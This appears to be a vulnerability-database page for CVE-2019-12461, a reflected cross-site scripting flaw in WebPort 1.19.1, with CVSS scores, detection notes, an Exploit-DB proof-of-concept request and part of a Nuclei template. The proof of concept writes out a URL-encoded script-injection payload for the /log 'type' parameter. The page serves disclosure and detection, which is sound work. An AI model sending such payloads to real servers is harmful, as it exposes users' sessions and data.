CVE-2019-12461
published 2019-05-30CVE-2019-12461: Web Port 1.19.1 allows XSS via the /log type parameter.
PriorityP345medium6.1CVSS 3.0
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
9.92%
95.0th percentile
Web Port 1.19.1 allows XSS via the /log type parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| webport | web_port | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect reflected XSS exploitation attempts by matching URL-encoded script injection in the 'type' query parameter of GET requests to /log ↗
- →Match response body for unescaped reflected payload string '"alert(document.domain);' in text/html responses with HTTP 200 to confirm successful XSS reflection ↗
- →The session cookie name used by WebPort is '__tiny_sessid'; monitor for this cookie being transmitted over attacker-crafted XSS links targeting port 8090 ↗
- ·The exploit was tested on both Windows and Linux deployments of WebPort 1.19.1; detection rules should be applied regardless of OS platform ↗
- ·The vulnerability is specifically in version 1.19.1; the /log endpoint's 'type' parameter is the sole confirmed injection point ↗
CVSS provenance
nvdv3.06.1MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WebPort 1.19.1 - Reflected Cross-Site Scripting
exploitdb·2020-06-22·CVSS 6.1
CVE-2019-12461 [MEDIUM] WebPort 1.19.1 - Reflected Cross-Site Scripting
WebPort 1.19.1 - Reflected Cross-Site Scripting
---
# Exploit Title: WebPort 1.19.1 - Reflected Cross-Site Scripting
# Date: 2019-05-30
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: https://webport.se/
# Software Link: https://webport.se/nedladdningar/
# Version: v1.19.1
# Tested on: Windows/Linux
# CVE-2019-12461
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12461
# https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
# PoC
To exploit vulnerability, someone could use 'http://
[server]:8090/log?type="alert('xss');'
request
to impact users who open a maliciously crafted link or third-party web page.
GET /log?type=%22%3C/script%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E%3Cscript%3E
HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv
Nuclei
WebPort 1.19.1 - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2019-12461 [MEDIUM] WebPort 1.19.1 - Cross-Site Scripting
WebPort 1.19.1 - Cross-Site Scripting
Web Port 1.19.1 is vulnerable to cross-site scripting via the /log type parameter.
Template:
id: CVE-2019-12461
info:
name: WebPort 1.19.1 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: Web Port 1.19.1 is vulnerable to cross-site scripting via the /log type parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade to the latest version of WebPort (1.19.2 or higher) which includes a fix for this vulnerability.
reference:
- https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
- https://webport.se/nedladdningar/
- ht
http://packetstormsecurity.com/files/158174/WebPort-1.19.1-Cross-Site-Scripting.htmlhttps://emreovunc.com/blog/en/WebPort-Reflected-XSS-02.pnghttps://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS/http://packetstormsecurity.com/files/158174/WebPort-1.19.1-Cross-Site-Scripting.htmlhttps://emreovunc.com/blog/en/WebPort-Reflected-XSS-02.pnghttps://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS/
2019-05-30
Published